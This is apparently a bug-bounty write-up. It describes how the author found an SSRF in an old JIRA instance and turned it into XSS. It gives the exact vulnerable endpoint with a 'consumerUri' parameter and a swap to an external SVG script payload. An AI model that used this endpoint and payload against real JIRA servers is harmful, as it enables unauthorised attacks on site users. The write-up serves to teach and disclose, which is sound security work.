SSRF to XSS -750$ Story

According to PortSwigger, Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization’s infrastructure, or to external third-party systems.

According to OWASP, Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benitign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Let’s get started:

While testing a domain, I found a subdomain which was using JIRA Instance. I checked the version with wappalyzer tool it was “version 5.8.X”, this version was vulnerable by SSRF. I remember the write-up of “Alyssa Herrera” (“https://infosecwriteups.com/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a”).

There was an endpoint “plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com”

So I followed up the write-up. I wen to brute-XSS blog, replaced http://google.com with http://brutelogic.com.br/poc.svg …. Boom XSS popped-up

I want to also attach some tips for beginners, to get succeed in bug bounties.

You can also follow me on Linkedin , Twitter .

Hope you guys learnt something new. If you liked it share with your fellow hackers. I’ll be posting 2 write-ups in a week. Untill then Goodbye!